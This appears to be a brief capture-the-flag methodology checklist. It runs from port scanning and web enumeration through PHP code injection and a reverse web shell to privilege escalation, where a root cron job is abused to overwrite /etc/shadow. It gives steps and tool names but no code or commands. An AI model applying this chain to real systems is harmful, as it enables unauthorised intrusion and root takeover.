http->code injection->web reverse shell -> priv esc
1)discovery : which ports are opened?
– only 80 port is opened
2)enumerate : third party web platform?
– use gobuster to check directory structure
– check the website, does it use open source platform? any known vulnerabilities?
– are those files really images? or have weird sizes compared to other one?
– find username and password by enumerating webpage, image files
– ask google for a help, research blog
3)manipulate webpage : any possible exploits?
– inject php code
4)get a reverse shell : can we get a reverse web shell?
– manipulate HTTP request by using burp
– php cmd shell
5)privilege escalation : any mis-configurations or vulnerabilities?
– pspy to check system process
– focus on cronjob which as privileged permission
– replace file to /etc/shadow in cronjob
– copy normal users hashed password to root in /etc/shadow
Tools & References
tools: gobuster, wfuzz, pspy